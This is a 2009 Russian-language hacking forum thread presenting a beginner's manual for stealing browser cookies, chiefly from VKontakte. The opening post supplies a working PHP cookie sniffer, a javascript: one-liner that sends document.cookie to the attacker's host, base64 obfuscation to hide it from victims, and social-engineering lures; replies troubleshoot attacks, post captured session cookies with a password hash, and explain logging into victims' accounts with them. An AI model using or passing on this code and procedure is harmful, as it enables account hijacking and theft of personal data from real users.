мануал по угону куков с любого сайта
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
мануал по угону куков с любого сайта - 2009-08-15 12:13:10.190000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
Hello World!;) В этой статье я расскажу об одном способе кражи файлов cookies, который почему-то не очень часто применяется…Статья – для новичков (матерые хакеры уже давно все знаю). Этот способ основан на том, что в строку браузера кроме адреса веб-страниц можно также вставлять javascript – код, который выполнится на той веб – странице, на которой вы находитесь. Пример: если находясь на странице своего профиля vkontakte.ru в строке адреса набрать «javascript:alert(document.cookie);» то выведется всплывающее сообщение в котором будут ваши куки. Этот способ чем-то похож XSS – уязвимость, он позволяет выполнить произвольный javascript – код. А запретить вставлять в строку браузер javascript невозможно, поэтому этим способом можно пользоваться абсолютно на всех сайтах. Хакерам ничто не мешает их таким же образом отправить к себе на ftp. Этот способ очень моден сейчас. Почитайте, что он нем пишет администрация Контакта - http://vkontakte.ru/topic-777107_1174285. Отдельную тему даже создали, так как способ очень популярен.
Сейчас мы попробуем написать такой javascript – код, который бы при вставке в строку браузера, отправлял куки жертвы на php (он называется сниффер), который в свою очередь сохранял бы их в текстовый файл на ftp – сервере. Хотя сейчас можно воспользоваться любым онлайн сниффером типа: [ul]http://sniffer.xaknet.ru/http://hacker-pro.net/sniffer/http://na-s.ru/http://www.planety-hackeram.ru/sniff/http://kanick.ru/sniffer/personal.rar/ (архив со сниффером для заливки на хост)[/ul] Но мы попробуем сами написать свой php – сниффер и использовать его для кражи куков… Это всё не очень сложно, если ты знаешь javascript и php (хотя бы чуть-чуть). [ol]Для начала нам понадобится любой хостинг с поддержкой phpсоздаем файл с расширением php и пишем там: <?
$query = $_SERVER['QUERY_STRING']; //эта часть скрипта принимает украденные cookies,
переданные JavaScript'ом.
$query .= "\n"; //каждая запись производится с новой строки
$db="cookies.txt"; //здесь мы определили файл, куда будет производиться запись
полученных cookies.
$fh=fopen ($db, "a+"); //открыли файл для записи, запись всегда будет производиться в
конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); //после записи закрыли файл.
?> Это код php – сниффера который будет обрабатывать куки жертвы. заливаем его на хост создаем сам javascript – код для вставки в строку браузе: javascript:document.location.replace('http://ваш_сайт/ваш_пхп.php?com='+document.cookie); Разберем его по частям: [ul]1-aя часть: javascript:document.location.replacе - перенаправит украденные куки на наш сниффер.2-aя часть: ('http://ваш_сайт/ваш_пхп.php - указывает на адрес нашего сниффера.3-я часть: ?com='+document.cookie); - присваивает переменной com украденные cookies.[/ul] По выполнению этого скрипта куки будут отосланы на ваш ftp и записаны в файл cookies.txt :D Следующий шаг - шифруем наш код алгоритмом base64 .Он превращает наш код в нечитаему краказябру, но при этом он продолжает работать:D Это нужно для тго, чтобы жертва ничего не заподозрила. Итак, заходим на сайт http://www.opinionatedgeek.com/dotnet/tools/Base64Encode/Default.aspx. В верхнее поле вводим наш вредоносный javascript - код, нажимаем на кнопку "Encode", и в нижнем поле получаем наш зашифрованный код…Теперь, чтобы он заработал нужно в строке адреса написать: data:text/html;base64, <дальше ваш зашифрованный код> Прописываем это в строку адреса, жмём Enter и вуаля, код сработал. Надо сказать, что эта фишка действует только в браузере Opera (во всяком случае у меня на компьютере).:)Впариваем файл жертве. Впарить что-либо – это целиком дело социальной инженерии. Можно сказать, что скрипт поднимает рейтинг Вконтакте, или позволяет писать личные сообщения Павлу Дурову и т.д.:D Вот и всё….в файл cookies.txt пришли куки жертвы. Их можно либо расшифровать (советую онлайн сервис расшифровки md5 - http://www.md5.rednoize.com/, хотя можно и домашним брутом PasswordsPro воспользоваться) либо сразу подставить (используйте браузер Opera или Firefox).;) [/ol] P.S. в этой статье я рассмотрел угон куков с сайта vkontakte.ru, но вместо него может любой сайт с куками - почтовики, форумы и т.д. P.P.S будут вопросы, комментарии - оставляйте….хочется чтобы новички не только прочитали эту сатью, но и осуществили всё мною вышеописанное. [sm=goodjob.gif][sm=dont.gif]
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 16:14:03.310000
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
"Статья" copy past from http://x3n0n.jino-net.ru/articles/3.txt, хотя я не уверен там оригинал. А вообще этот :|||||||||: начал гулять с antichatа называется данный тип уязвимости XSS. http://forum.antichat.ru/thread20140.html Полная статья по XSS. Про то что где то я уже видел этот "сниффер" думаю не стоит говорить.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 16:37:25.663333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
DzumoHu4 статью я сам писал полностью…никаких копипастов…посмотри….моя стать я и то что ты дал - разные….код я взял оттуда…он рабочий, че я его переделывать что-ли буду ?! присмотрись…всё кроме кодов и объяснения строчки document.location.replace('http://ваш_сайт/ваш_пхп.php?com='+document.cookie); - разное…
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 17:10:02.733333
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
quote:
ORIGINAL: daniel_1024 DzumoHu4 статью я сам писал полностью…никаких копипастов…посмотри….моя стать я и то что ты дал - разные….код я взял оттуда…он рабочий, че я его переделывать что-ли буду ?! присмотрись…всё кроме кодов и объяснения строчки document.location.replace('http://ваш_сайт/ваш_пхп.php?com='+document.cookie); - разное… "С миру по нитке голому рубашка."(с) Не спорю для кого то XSS станет откровением:) таких процентов этак 60% форума. То что ты написал(скопипастил, не важно) не более чем мануал) Что где нажать чтобы получилось вот такая вот хреновина.) Не рассмотрены принципы работы XSS, меры предосторожности и прочие атрибуты "статьи".
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 17:39:20.826666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
daniel_1024 об этом еще Хакер9009 писал в уроке №17 "XSS II Восстание самодостаточных" http://forum.xakep.ru/fb.aspx?m=1377181
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 17:48:39.383333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
ндааа…..обидно….вот что значит не изучить что до тебя писали….тем про которых нет материала на форуме мало…вот и приходится повторятся…
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-15 18:00:45.010000
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
quote:
ORIGINAL: daniel_1024 ндааа…..обидно….вот что значит не изучить что до тебя писали….тем про которых нет материала на форуме мало…вот и приходится повторятся… Вот что значит не знать что такое Поиск.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-29 19:58:50.333333
|
|
|
vzadnikov
Сообщений: 82
Оценки: 0
Присоединился: 2009-07-01 02:27:18.446666
|
Чтото я нереальный лох :D Я всё подряд уже вставляю в адрессную строку и при нажатии ентер у меня вместо отправки куков на мой снифер, да и просто alert('1'), появляются сообщения типа: "Вы попытались получить доступ к адресу http://xn–jvsript-2fgb5o/;, который сейчас недоступен. Убедитесь, что веб-адрес (URL) введен правильно, и попытайтесь перезагрузить страницу." Вводил: jаvаsсript:alert(document.cookie); Что за фигня кароч, я тупой :)
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-29 21:18:39.056666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
vzadnikov а текст ты вводил руками или копировал с форума? Просто форум уродует команды русскими буквами.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-29 21:24:30.226666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
vzadnikov а текст ты вводил руками или копировал с форума? Просто форум уродует команды русскими буквами.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-29 21:26:23.820000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
vzadnikov а текст ты вводил руками или копировал с форума? Просто форум уродует команды русскими буквами.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-08-29 21:33:09.646666
|
|
|
vzadnikov
Сообщений: 82
Оценки: 0
Присоединился: 2009-07-01 02:27:18.446666
|
Копировал ) Спасибо, теперь всё работает :)
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-25 15:23:54.490000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити а фтп narod.ru подойдёт для отправки кукисов? джаваскрипт в строке браузера должен выглядить так?:jаvаsсript:document.location.replace('http://site.narod.ru/1.php?com='+document.cookie); или vkontakte.ru/id123jаvаsсript:document.location.replace('http://site.narod.ru/1.php?com='+document.cookie); ато чёт пробывал на фтп несоздаётся txt с куками
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-25 16:56:35.510000
|
|
|
pig
Сообщений: 35
Оценки: 0
Присоединился: 2009-10-22 14:43:59.330000
|
спасибо, хоть идея не оригинальна но главное что действенна ;)
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-26 14:30:41.546666
|
|
|
azan4ik
Сообщений: 39
Оценки: 0
Присоединился: 2009-10-20 22:11:35.503333
|
Людишки, вот пытаюсь взламать вконтакте. Достал я куки remixlang=0; remixnews_privacy_filter=0; remixchk=5; remixsid=e01214220306d48389fe92cbesba76d343a6acaf1bf15a88f30e0c51 Объясните что означает каждая строчка. Где именно тут Тот шифр, который нужно расшивровать. Что на что нужно заменить?
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-30 14:05:59.050000
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
quote:
ORIGINAL: azan4ik Людишки, вот пытаюсь взламать вконтакте. Достал я куки remixlang=0; remixnews_privacy_filter=0; remixchk=5; remixsid=e01214220306d48389fe92cbesba76d343a6acaf1bf15a88f30e0c51 Объясните что означает каждая строчка. Где именно тут Тот шифр, который нужно расшивровать. Что на что нужно заменить? Вот твой код: e01214220306d48389fe92cbesba76d343a6acaf1bf15a88f30e0c51 ___________________________________________________________________ + єто не крестик, єто плюсик.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-30 14:14:58.230000
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
quote:
ORIGINAL: Lorden подскажити а фтп narod.ru подойдёт для отправки кукисов? джаваскрипт в строке браузера должен выглядить так?:jаvаsсript:document.location.replace('http://site.narod.ru/1.php?com='+document.cookie); или vkontakte.ru/id123jаvаsсript:document.location.replace('http://site.narod.ru/1.php?com='+document.cookie); ато чёт пробывал на фтп несоздаётся txt с куками 'http://site.narod.ru/1.php?com='+document.cookie ты ошибся, надо вот так 'http://narod.ru/1.php?com='+document.cookie
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-30 16:26:10.226666
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
здраствуйте! подскажити, вот я на фтп получил куки от сайта такого вида: com=uid=25833;%20pass=9bcc02853bbb72f68eddcf98a3a81666;%20PHPSESSID=819b8a5079a5885e62f0b818d5ef8518 как их расшифровать? как и куда нужно подставить этот текст чтоб на сайт заходило автоматом?
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-30 20:40:44.396666
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
quote:
ORIGINAL: Lorden здраствуйте! подскажити, вот я на фтп получил куки от сайта такого вида: com=uid=25833;%20pass=9bcc02853bbb72f68eddcf98a3a81666;%20PHPSESSID=819b8a5079a5885e62f0b818d5ef8518 как их расшифровать? как и куда нужно подставить этот текст чтоб на сайт заходило автоматом? Подставлять куки надо через оперу. Заходиш в инструменты=>настройки=>дополнительно=>cookies=>управление cookies=>ноходиш свой сайт и подставляеш свои куки и ты на учетке того чьи куки ты стырил) __________________________________________________________________________________ + это не крестик, это плюсик :)
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-31 22:05:28.470000
|
|
|
serega2894
Сообщений: -185
Оценки: 0
Присоединился: 2009-10-31 10:23:11.020000
|
у меня вопрос я забыл пароль от сайт "в контакте" как мне через скрипы его востановить? каккой скрипт надо или это не возможно?
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-31 22:20:41.730000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: serega2894 у меня вопрос я забыл пароль от сайт "в контакте" как мне через скрипы его востановить? каккой скрипт надо или это не возможно? через скрипты вродь никак востановить нельзя, ну если ток с помощью кукскрипта но незнаю можноли куки расшифровать в вид логин:пароль
|
|
|
RE: мануал по угону куков с любого сайта - 2009-10-31 22:24:57.720000
|
|
|
serega2894
Сообщений: -185
Оценки: 0
Присоединился: 2009-10-31 10:23:11.020000
|
блин и что делать? проблема просто в том, что mail к которому контакт прикрёпрён у меня неделю назад ломанули, так что просто востановить контакт я не могу! а может кто нибудь поможет с майлом?
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-01 18:38:28.943333
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
quote:
ORIGINAL: serega2894 блин и что делать? проблема просто в том, что mail к которому контакт прикрёпрён у меня неделю назад ломанули, так что просто востановить контакт я не могу! а может кто нибудь поможет с майлом? Наверное вирус подцепил. Смени мыло в конте(если понадобится подтверждение со старого мыльника, тогда придется лоамть мыльник).
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-01 18:47:21.103333
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
Напишите пример скрипта с http://sniffer.xaknet.ru/ (как правельно запишетса скрипт?)
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-01 20:24:23.050000
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
Все, понял.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-01 20:57:45.090000
|
|
|
ещуркелр
Сообщений: 46
Оценки: 0
Присоединился: 2009-10-31 17:28:51.930000
|
он её дал месяц назад…..мне кажется её уже прикрыли.
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-01 22:02:57.950000
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
Да уже прикрыли… Блин!!!
|
|
|
RE: мануал по угону куков с любого сайта - 2009-11-06 00:31:20.066666
|
|
|
kosmo987
Сообщений: 10
Оценки: 0
Присоединился: 2009-11-06 00:20:27.666666
|
че то у меня не получается:( допустим у меня сайт kos.0fees.net я туда кидаю 1.php со сниффом и cookies.txt,потом у себя в контакте в адресной строке вручную прописываю jаvаsсript:document.location.replace('http://kos.0fees.net/1.php?com='+document.cookie); и ничего не выходит.все вручную писал.единственное,в контакте в адресной строке появляются мои куки,а на сайт не уходят. че делать?
|
|
|
|
|